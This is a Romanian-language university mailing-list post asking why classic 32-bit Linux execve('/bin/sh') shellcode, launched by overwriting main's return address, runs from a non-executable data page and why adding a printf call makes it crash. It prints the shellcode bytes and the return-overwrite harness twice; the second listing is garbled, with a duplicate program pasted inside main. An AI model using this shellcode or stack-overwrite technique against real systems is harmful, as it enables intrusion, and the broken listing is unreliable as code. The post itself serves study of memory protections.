[so] pagini si drepturi de executie in Linux. security

Alexandru Goia goia.alexandru.linux at gmail.com
Tue Jun 5 19:33:26 EEST 2012


Buna ziua,

Sa zicem ca avem urmatorul cod sursa :

char sc[]=              /* 24 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

main()
{
        int *ret;

        ret = (int *)&ret + 2;
        *ret = sc;

}

Ce se intampla in sc[] este un apel execve, pentru un shell (/bin/bash).

Problema/intrebarea este : DE CE acest cod functioneaza ? (Linux Intel
32-bit),
caci daca compilam si rulam pmap si gdb pe el, vedem o pagina read & exec,
de la adresa 0x08048000, in care se alfa main(), si o pagina read & write
(but no exec),
in care se afla sc[], de la adresa 0x08049000.

In main, tot ce facem este sa suprascriem pe stiva (care este read & write)
adresa de return a lui main(), care suprascrisa trimite la cod executabil
de la
adresa lui sc[], dar sc[] este intr-o pagina fara drept de executie.

So, DE CE functioneaza, totusi ?

Am testat acest program si pe procesoare cu NX-bit, si cu kernel NX enabled,
si pe procesoare mai vechi, fara NX-bit, dar care au si ele kernel ce face
rwx pe pagini.
(Slackware Linux 13.1, 32-bit, Linux kernel 2.6.33.4, GCC 4.4.4 : ambele
cazuri).


Partea a 2-a :

Daca adaugam un apel de functie la sfarsitul lui main(), de exemplu ca mai
jos,
vom obtine de fiecare data segmentation fault.

Intrebare : DE CE aici nu "merge", si mai sus "merge" ?

#include <stdio.h>

char sc[]=              /* 24 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

main()
{char sc[]=              /* 24 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

main()
{
        int *ret;

        ret = (int *)&ret + 2;
        *ret = sc;

    sleep(1000);
}
        int *ret;

        ret = (int *)&ret + 2;
        *ret = sc;

         printf("Security\n");
}


Referinte :
http://www.enderunix.org/docs/en/bof-eng.txt
http://www.phrack.org/issues.html?issue=49&id=14#article

Cu gandul ca doar cu o cunoastere temeinica a subiectului
si a feature-urilor de securitate pe care le ofera sistemul de operare
putem dormi linistiti daca avem servere conectate la Internet :-),
va multumesc,
Alexandru
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://cursuri.cs.pub.ro/pipermail/so/attachments/20120605/11fc8ef0/attachment.html>


More information about the so mailing list